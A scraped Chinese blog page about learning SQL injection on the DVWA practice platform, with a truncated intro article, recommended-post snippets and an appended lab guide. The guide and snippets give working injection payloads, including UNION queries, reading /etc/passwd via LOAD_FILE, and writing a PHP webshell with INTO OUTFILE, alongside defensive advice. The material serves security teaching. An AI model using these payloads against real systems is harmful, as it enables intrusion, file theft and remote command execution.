DVWA平台的sql注入学习

最新推荐文章于 2025-01-23 17:19:51 发布
原创 最新推荐文章于 2025-01-23 17:19:51 发布 · 3.9k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了SQL注入的概念、原因、作用原理及其可能造成的危害,如数据泄露和系统瘫痪。同时,文章强调了避免SQL注入的方法,如参数化查询和字符过滤。以DVWA平台为例,展示了如何利用SQL注入获取敏感信息,提醒开发者注意代码安全。

概念

SQL攻击 简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入 SQL 指令,在设计不良的 程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的 SQL 指令而运行,此因遭到破坏或是入侵。

原因

在应用程序中若有下列状况,则可能应用程序正暴露在SQLInjection的高风险情况下:

1.  在应用程序中使用字符串联结方式组合SQL指令。

2.  在应用程序链接数据库时使用权限过大的账户(例如很多开发人员都喜欢用sa(内置的最高权限的系统管理员账户)连接Microsoft SQL Server数据库)。

3.  在数据库中开放了不必要但权力过大的功能(例如在MicrosoftSQL Server数据库中的xp_cmdshell延伸预存程序或是OLE Automation预存程序等)

4.  太过于信任用户所输入的数据,未限制输入的字符数,以及未对用户输入的数据做潜在指令的检查。

作用原理

1.  SQL命令可查询、插入、更新、删除等,命令的串接。而以分号字符为不同命令的区别。(原本的作用是用于SubQuery或作为查询、插入、更新、删除……等的条件式)

2.  SQL命令对于传入的字符串参数是用单引号字符所包起来。《但连续2个单引号字元,在SQL资料库中,则视为字串中的一个单引号字元》

3.  SQL命令中,可以注入注解《连续

最低0.47元/天 解锁文章
wenjie93
关注
[网络安全]DVWASQL注入—High level解题简析 [网络安全]DVWASQL注入—High level解
2401_88752464的博客
01-05 487
由以上两个回显可知,该注入类型为字符型注入。由以上两个回显可知,注入点个数为两个。
DVWA——SQL注入
m0_74426634的博客
04-07 1660
日前,国内最大的程序员社区优快云网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWA下的SQL注入
07-25
SQL
手动漏洞挖掘(DVWA)SQL注入
weixin_30337251的博客
07-09 237
SQL注入的原因是因为服务器没有对 客户端数据进行判断,且前端的数据是击者可以控制,击者就可以构造不同的语句对数据库进行任意操作 寻找SQL注入点方式: 1.查看是否报错,从而判断是否对输入的SQL语句进行筛查 还是基于DVWA,我们输入'1'的时候: 提示我们输入错误,这里显示'1'''说明页面在接受我们输入的时候,是将我们的数据放置...
DVWA-SQL Injection(SQL注入)
简简的博客
02-02 696
本系列文集:DVWA学习笔记 SQL注入,是指击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 SQL 注入分类 按SQLMap中的分类来看,SQL注入类型有以下 5 种: UNION query SQL injection(可联合查询...
dvwa中的sql注入
Jerome的博客
05-02 579
首先先启动网站,点击DVWA Security 将安全等级改为Low后提交即可。 点击SQL Injection ,输入:1,判断注入类型是数字型还是字符型。 根据返回信息,所以知道是数字型 输入:1’ ORDER BY 1# 输入:1’ ORDER BY 2# 输入 :1’ ORDER BY 3# ,发现报错信息,由此可以判断字段不超过3。 由于我们知道只有两个字段,所以可以输入:1’ UNION SELECT 1,2# 输入:1’ union select database(),versio
DVWA-----SQL Injection(SQL手工注入
热门推荐
m0_65712192的博客
11-21 1万+
DVWA-----SQL Injection(SQL手工注入
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
DVWA靶场SQL注入
Tangyoo的博客
07-03 1706
SQL注入是指击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
SQL注入DVWA靶场SQL注入实践
weixin_40433003的博客
01-23 1594
接下来,对于数据库5.0以上的版本,存在information_schema表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表等信息;如上图所示,可以看到我们获得了关键字段:user和password,因此我们接着使用如下语句进行注入。(3)确定回显位置为第二个位置(查询结果显示在原始查询返回的第二列的位置)firefox自带插件,但是遇到收费版本,需要引入一个文件(进行过滤,即击者可以对数据库进行操作。当输入1,回显正常,确认存在sql注入。,返回错误,说明页面没有对。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWASQL注入(盲注)
天空之蓝的博客
11-17 4840
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入击者可以直接从页面上看到注入语句的执行结果,而盲注时击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA练习3-SQL注入
seeicb的博客
03-11 559
title: DVWA练习3-SQL注入 date: 2016-03-02 22:44:13 categories: 安全 tags: [Web安全,SQL注入] 一、SQL注入 1.简介 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的...
DVWA-SQL注入
WY92139010的博客
05-03 1131
DVWA-SQL注入 一、SQL注入概念 SQL注入是指击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入...
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 8040
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
基于dvwasql注入,使用fiddler修改请求参数
hungryfoolisher的博客
12-23 1804
背景:本学期(大四上)的课程《数据库安全》选题为“基于dvwasql注入”,当我在进行medium级别的sql注入的时候,需要通过抓包修改参数。在此处主要详述基于dvwasql注入的medium级别中使用fiddler修改参数的方法。若要参考基于dvwa的更多操作,可参考: http://www.freebuf.com/articles/web/120747.html https://
DVWASQL注入(LOW)
weixin_46831054的博客
02-17 3409
SQL注入流程 面对一个查询条件的web网页,我们需要做以下的事情 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据 这里我们用hackbar,方便我们操作。 http://192.168.5.155:85/vulnerabilities/sqli/?id=1&Submit=Submit# 利用hackbar后我们在加黑处进行命令修改,以达到手工注入的目的 1.判断是否
DVWA练习之SQL Injection
dz919908651的博客
08-27 1581
DVWA练习之SQL Injection 本博客将记录在web安全问题中一种常见的漏洞——“SQL注入”漏洞的实践演练。首先阐述SQL注入漏洞的概念,原理,最后展示基于DVWA的各种等级的SQL注入漏洞。 SQL注入 概念:指击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如...
DVWA - SQL Injection (low, medium, high)
无节操
01-06 2775
low查看源码,可发现是注入点id为字符类型,无验证,直接上:' union select first_name, password from users#返回结果如下:ID: ' union select first_name, password from users# First name: admin Surname: e2075474294983e013ee4dd2201c7a73 ID:
dvwasql注入
最新发布
07-06
### 3.2 DVWA 中的 SQL 注入测试与实践指南 DVWA(Damn Vulnerable Web Application)是一个专为安全研究人员和渗透测试人员设计的易受击的 Web 应用程序,常用于学习和练习 Web 安全漏洞的检测与利用方法。其中,SQL 注入SQL Injection)是其核心模块之一,可用于理解实践 SQLi 击的基本原理和技术手段。 #### 3.2.1 设置与访问 DVWA 环境 在开始之前,需确保本地或远程环境中已部署好 DVWA。通常可使用 XAMPP 或 LAMP 套件进行部署,通过浏览器访问 `http://localhost/dvwa` 登录界面。首次运行时需点击“Create / Reset Database”按钮初始化数据库结构。 进入设置页面后,将安全等级(Security Level)调整为 `low`,以便于进行 SQL 注入测试。此模式下未对输入做任何过滤或转义处理,便于初学者观察击流程[^1]。 #### 3.2.2 SQL 注入基础测试流程 以 DVWA 的“SQL Injection”页面为例,用户可通过输入用户名来查询对应的用户信息。击者可以尝试注入恶意字符串以绕过逻辑判断或读取敏感数据。 ##### 示例:获取当前数据库名称 ```sql ' UNION SELECT NULL, database() -- - ``` 该语句利用了 `UNION SELECT` 将原始查询结果与注入内容合输出,借助注释符 `-- -` 忽略后续可能存在的代码片段。若应用未对输入进行有效校验,则会返回当前数据库名。 ##### 示例:获取数据库版本信息 ```sql ' UNION SELECT NULL, version() -- - ``` 该命令可获取 MySQL 版本信息,有助于进一步判断目标环境是否支持特定功能,如 `LOAD_FILE()`、`INTO OUTFILE` 等高危函数。 #### 3.2.3 利用 SQL 注入读取服务器文件 若 MySQL 配置中启用了 `local_infile` 功能,击者可尝试通过 `LOAD DATA INFILE` 或 `LOAD_FILE()` 函数读取服务器上的文件内容。例如: ```sql ' UNION SELECT NULL, LOAD_FILE('/etc/passwd') -- - ``` 此操作可读取服务器上的敏感配置文件(如 `/etc/passwd`),前提是当前数据库用户具有相应权限且文件路径存在。需要注意的是,此类行为属于非法入侵活动,在真实网络环境中实施前必须获得授权。 #### 3.2.4 利用 SQL 注入写入 WebShell 当具备写入权限时,可尝试将 PHP 代码写入 Web 目录,从而实现远程代码执行。例如: ```sql ' UNION SELECT NULL, "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php' -- - ``` 成功执行后,可通过访问 `http://target/shell.php?cmd=id` 执行任意系统命令。此类击方式危害极大,应在可控实验环境中进行测试。 #### 3.2.5 防御建议与最佳实践 - **参数化查询**:使用预编译语句(Prepared Statement)替代字符串拼接,从根本上防止 SQL 注入。 - **最小权限原则**:限制数据库用户的权限,避免授予不必要的文件读写权限。 - **输入验证与过滤**:对所有用户输入进行严格校验,拒绝非法字符组合。 - **错误信息控制**:关闭详细错误输出,防止击者通过报错信息推测内部结构。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值